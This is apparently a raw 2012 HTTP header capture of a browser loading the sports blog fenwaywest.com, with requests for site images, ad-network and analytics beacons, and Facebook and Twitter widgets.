Set-Cookie: tuuid=ee20756b-05a3-42ba-b35a-684fe20ce5b2; path=/; expires=Sun, 19-Nov-2017 01:30:47 GMT; domain=.pswec.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 43
Date: Sun, 18 Nov 2012 01:30:47 GMT
GET /navigation/images/football.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:15 GMT
Etag: &quot;226b80-15bd-4ca2be7034bc0&quot;
Accept-Ranges: bytes
Content-Length: 5565
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /navigation/images/basketball.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:14 GMT
Etag: &quot;226b78-156a-4ca2be6f40980&quot;
Accept-Ranges: bytes
Content-Length: 5482
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /navigation/images/baseball.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:13 GMT
Etag: &quot;226b75-15a4-4ca2be6e4c740&quot;
Accept-Ranges: bytes
Content-Length: 5540
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /ctst=1/site=782471/size=160600/u=2/bnum=85478879/wkhr=2/hr=2/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

Host: r1.ace.advertising.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?bV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAABA3hSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACX2LjcxR7xDA8nR1wRjmwAFZqC.YoMS94jNffjAAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html,B%3D1%26Z%3D160x600%26_salt%3D1916686269%26anmember%3D514%26anprice%3D50%26r%3D0%26s%3D653070,92f3c750-311f-11e2-a7f3-ebbbc404545f,1353202245373
Cookie: ACID=NL630013532022460065; ASCID=NL630013532022460065
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP=&quot;NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV&quot;, an.n=&quot;Advertising.com&quot;, an.pp=&quot;http://advertising.aol.com/privacy/advertisingcom&quot;, an.oo=&quot;http://advertising.aol.com/privacy/advertisingcom/opt-out&quot;, an.by=&quot;Y&quot;
Comscore: CMXID=2115.1004220.782471.0XMC
Set-Cookie: F1=BckOoClAAAAAHC/CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 18-Nov-2014 01:30:47 GMT; path=/ 85478879=_50a83a47,6173821811,782471^1004220^-20^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 18 Nov 2012 01:30:47 GMT
ntCoent-Length: 485
Content-Encoding: gzip
Content-Length: 321
GET /navigation/blogimages/college/crystalballrun.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:09:53 GMT
Etag: &quot;226b10-9bbd-4ca2be5b39a40&quot;
Accept-Ranges: bytes
Content-Length: 39869
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /navigation/blogimages/general/awfulannouncing.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:04 GMT
Etag: &quot;226b41-927e-4ca2be65b7300&quot;
Accept-Ranges: bytes
Content-Length: 37502
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /banners/scripts/bootstrap/Adform.Bootstrap.js?v=28 HTTP/1.1

Host: s1.adformdsp.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=l_PMSpduFECX88xKl24UQAAAAAAAAPA_nVPGf38WIUCdU8Z_fxYhQBfQJ3sE6s1BoArzhH1cTlFGOqhQAAAAAHwJDgAYAQAA5wUAAFsAAAD_QjsAqZECAAAAAQBVU0QAVVNEACwB-gDaJQAAzhcAAgUCAQUAAIQAMCLWxwAAAAA.&amp;pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/124112090/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d336c436f4f6b594142396245?&amp;vpid=1&amp;referrer=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347&amp;custom_macro=ENC_CPM%5EzZCw86LB5ZC7lunZ-RHvo7TOhmYLyqZV7cWy01SvO8c1%5EENC_CID%5EpaebqcWa9Kg4ukszB6hDMjPkTESS5L7Q0%5EENC_TPC%5EcHdjYo81GdgVFcFHG1iKLKbyqSb8bzB30%5EINV_SRC%5E3%5EIAB_CATS%5E&amp;media_subtypes=1&amp;dlo=1
Cookie: uid=5764607523038943412
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: nginx/1.0.15
Date: Sun, 18 Nov 2012 01:30:47 GMT
Last-Modified: Thu, 15 Nov 2012 12:48:13 GMT
Transfer-Encoding: chunked
Connection: close
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR LEG NAV INT&quot;
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=604800
Accept-Ranges: none
Content-Encoding: gzip
GET /plugins/like.php?api_key=&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D17%23cb%3Df5a4e152d64ce6%26origin%3Dhttp%253A%252F%252Ffenwaywest.com%252Ff16e45e0fb359%26domain%3Dfenwaywest.com%26relation%3Dparent.parent&href=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&node_type=link&width=90&font=arial&layout=button_count&colorscheme=light&action=like&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D17%23cb%3Df5a4e152d64ce6%26origin%3Dhttp%253A%252F%252Ffenwaywest.com%252Ff16e45e0fb359%26domain%3Dfenwaywest.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;node_type=link&amp;width=90&amp;font=arial&amp;layout=button_count&amp;colorscheme=light&amp;action=like&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: Y7nxGkG0/6/eJDvvVi298YFMqTDLlHSPcFR+/T6Welk=
Date: Sun, 18 Nov 2012 01:30:47 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /plugins/like.php?api_key=&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D17%23cb%3Df1e4617d4dfb00e%26origin%3Dhttp%253A%252F%252Ffenwaywest.com%252Ff16e45e0fb359%26domain%3Dfenwaywest.com%26relation%3Dparent.parent&href=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&node_type=link&width=90&font=arial&layout=button_count&colorscheme=light&action=like&show_faces=false&send=false&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D17%23cb%3Df1e4617d4dfb00e%26origin%3Dhttp%253A%252F%252Ffenwaywest.com%252Ff16e45e0fb359%26domain%3Dfenwaywest.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;node_type=link&amp;width=90&amp;font=arial&amp;layout=button_count&amp;colorscheme=light&amp;action=like&amp;show_faces=false&amp;send=false&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: GgjfxbVWdrApBQlNvvlRLOYvRNOeSp76peeW6UhTHfw=
Date: Sun, 18 Nov 2012 01:30:47 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /navigation/images/general.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:15 GMT
Etag: &quot;226b81-1454-4ca2be7034bc0&quot;
Accept-Ranges: bytes
Content-Length: 5204
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /navigation/images/hockey.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:15 GMT
Etag: &quot;226b83-137f-4ca2be7034bc0&quot;
Accept-Ranges: bytes
Content-Length: 4991
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /navigation/images/college.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:14 GMT
Etag: &quot;226b7c-1359-4ca2be6f40980&quot;
Accept-Ranges: bytes
Content-Length: 4953
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /delivery/fp?u=bloguin&z=95028&n=1 HTTP/1.1

Host: www.lijit.com
GET /delivery/fp?u=bloguin&amp;z=95028&amp;n=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJwNybENACEMA8BdXH9BTBIbVkPs%2FnQn3UFgY8pOpimRs4dX4UPwVbkshmslW35o3B8vKwsl
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: PWS/8.0.9.6
X-Px: ms h0-s12.p1-arn ( h0-s27.p1-arn), ht-d h0-s27.p1-arn.cdngp.net
Cache-Control: max-age=7200
Expires: Sun, 18 Nov 2012 02:48:51 GMT
Age: 2516
Content-Length: 6879
Content-Encoding: gzip
Vary: Accept-Encoding
Connection: keep-alive
GET /navigation/blogimages/hockey/puckdrunklove.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:11 GMT
Etag: &quot;226b66-12fd7-4ca2be6c642c0&quot;
Accept-Ranges: bytes
Content-Length: 77783
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /t.gif?_=1353202247229&count=horizontal&id=twitter-widget-0&lang=en&original_referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&size=m&text=__404__&url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&via=FenwayWest&type=share&twttr_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid= HTTP/1.1

Host: p.twitter.com
GET /t.gif?_=1353202247229&amp;count=horizontal&amp;id=twitter-widget-0&amp;lang=en&amp;original_referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;size=m&amp;text=__404__&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;via=FenwayWest&amp;type=share&amp;twttr_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;twttr_widget=1&amp;twttr_hask=0&amp;twttr_li=0&amp;twttr_pid= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1352365724.html
HTTP/1.1 200 OK

Content-Type: image/gif
Etag: &quot;377d257f2d2e294916143c069141c1c5:1328738114&quot;
Last-Modified: Wed, 08 Feb 2012 21:55:14 GMT
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
Date: Sun, 18 Nov 2012 01:30:47 GMT
Connection: keep-alive
GET /0/default/empty.gif HTTP/1.1

Host: imagen01.247realmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache/2.2.3 (Red Hat)
P3P: CP=&quot;NON NID PSAa PSDa OUR IND UNI COM NAV STA&quot;,policyref=&quot;/w3c/p3p.xml&quot;
Last-Modified: Fri, 23 Jan 2009 07:11:07 GMT
Etag: &quot;fb0001-2b-4612117be38c0&quot;
Accept-Ranges: bytes
Content-Length: 43
Date: Sun, 18 Nov 2012 01:30:47 GMT
Connection: keep-alive
GET /navigation/images/facebook.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:14 GMT
Etag: &quot;226b7f-4cf-4ca2be6f40980&quot;
Accept-Ranges: bytes
Content-Length: 1231
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /navigation/images/twitter.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:17 GMT
Etag: &quot;226b91-760-4ca2be721d040&quot;
Accept-Ranges: bytes
Content-Length: 1888
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /b?c1=8&c2=2101&c3=1234567891234567891&ns__t=1353202247852&ns_c=ISO-8859-1&c8=&c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26r%3Dhttp%253A%252F%252Fwww.shinynylonarts.com%252F&c9=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;ns__t=1353202247852&amp;ns_c=ISO-8859-1&amp;c8=&amp;c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26r%3Dhttp%253A%252F%252Fwww.shinynylonarts.com%252F&amp;c9=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dg.specificclick.net/?y=3&amp;t=h&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;r=http%3A%2F%2Fwww.shinynylonarts.com%2F
Cookie: UID=546eda-195.159.219.9-1353202238; UIDR=1353202238
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 18 Nov 2012 01:30:47 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /rsrc.php/v2/yI/x/1dQf_ATK831.png HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D17%23cb%3Df5a4e152d64ce6%26origin%3Dhttp%253A%252F%252Ffenwaywest.com%252Ff16e45e0fb359%26domain%3Dfenwaywest.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;node_type=link&amp;width=90&amp;font=arial&amp;layout=button_count&amp;colorscheme=light&amp;action=like&amp;show_faces=false&amp;send=false&amp;extended_social_context=false
HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Last-Modified: Fri, 29 Jun 2012 21:48:06 GMT
X-Content-Type-Options: nosniff
X-FB-Debug: DROeMGRPcdwLS4zkFLAnDVu5opvpxfNclOg2Khukp6I=
Content-Length: 567
Cache-Control: public, max-age=24496044
Expires: Wed, 28 Aug 2013 13:58:11 GMT
Date: Sun, 18 Nov 2012 01:30:47 GMT
Connection: keep-alive
GET /rsrc.php/v2/yJ/r/Qu-mFzAdV7Q.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
